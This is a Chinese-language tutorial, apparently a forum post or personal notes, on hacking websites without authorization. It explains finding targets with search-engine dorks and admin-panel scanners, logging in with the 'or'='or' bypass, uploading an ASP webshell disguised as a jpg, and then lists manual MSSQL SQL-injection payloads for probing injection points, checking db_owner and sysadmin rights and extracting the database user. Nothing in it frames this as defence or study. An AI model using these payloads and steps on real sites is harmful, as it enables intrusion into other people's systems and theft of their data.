我们知道要入侵一个有漏洞的网站肯定要去寻找这个网站怎么找这样的网站呢
一般都是到谷歌和百度去的 谷歌个人喜欢点 为什么这么说谷歌比较轻松 百度限制太多了 入侵一个网站肯定要找他的后台吧 找后台如何找呢 可用工具 比如啊d和明小子或者御剑 我觉得御剑挺方便的 扫到后台先尝试万能密码 'or'='or'在账号密码输入万能密码尝试 登录不了再尝试sql注入 如果登录进去先找到数据库备份因为有可能上传马的时候需要改成jpg格式而马必须asp格式这样就需要用到数据库备份 然后找个能上传东西的地方 拿webshell webshell的意思个人认为是网站执行环境
搜索引擎高级语法
intitle: 搜索网页中的中的标题名中是否包含指定字
inurl 搜索url网址中包含的指点字符串
filetype 搜索特定文件
site 搜索特定区域名信息
这些语法可用来搜索你想要的网站和网站漏洞或者一些源码搭建网站或者搜索后台
打开一个网站随便打开一个网页测试
sql注入最简单的检测漏洞
' 在网址最后面输入'如果返回正常那百分之60是没注入点的 如果返回是一些错误显示那这个网站是有注入点的
比如www.baidu.com后面输入’www.baidu.com'
e/Login.asp在网址最后面输入 一般都是返回正常
and 1=2在网址最后面输入 如果返回不是原来的页面可以说这个网站是存在注入漏洞的
切记在网址后面是要空格的 比如www.baidu.com and 1=1 这个空格表示是百分之二十
然后猜解用户名和密码
手工猜解
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用户名
and user>0
' and user>0 and ''='
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
检测是否支持多行
;declare @d int;--
或者工具
用啊d 啊d注入那输入有漏洞的URL 猜解